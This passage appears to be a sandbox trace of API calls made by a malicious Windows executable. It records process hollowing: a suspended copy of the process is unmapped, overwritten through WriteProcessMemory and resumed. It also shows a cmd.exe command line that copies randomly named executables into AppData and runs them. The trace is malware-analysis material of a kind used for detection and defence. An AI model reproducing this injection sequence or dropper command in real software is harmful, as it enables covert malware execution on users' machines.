lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0096.636] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0096.636] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0096.637] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0096.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0096.638] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0096.638] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0096.767] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0xa013c [0097.602] PostMessageA (hWnd=0xa013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0097.602] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0097.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0097.602] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3a0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0097.603] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0097.603] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xbbc, dwThreadId=0xbc0)) returned 1 [0097.605] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.605] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0097.605] GetThreadContext (in: hThread=0x48, lpContext=0x3a0000 | out: lpContext=0x3a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0097.697] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0097.697] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0097.697] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0097.697] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x154758*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x154758*, lpNumberOfBytesWritten=0x0) returned 1 [0097.698] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x154b58, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0097.698] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x154b58*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x154b58*, lpNumberOfBytesWritten=0x0) returned 1 [0097.706] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1a9158*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1a9158*, lpNumberOfBytesWritten=0x0) returned 1 [0097.707] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x15488c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x15488c*, lpNumberOfBytesWritten=0x0) returned 1 [0097.707] SetThreadContext (hThread=0x48, lpContext=0x3a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0097.707] ResumeThread (hThread=0x48) returned 0x1 [0097.707] CloseHandle (hObject=0x48) returned 1 [0097.707] CloseHandle (hObject=0x4c) returned 1 [0097.707] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0097.708] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0097.708] ExitProcess (uExitCode=0x0) Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1081 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 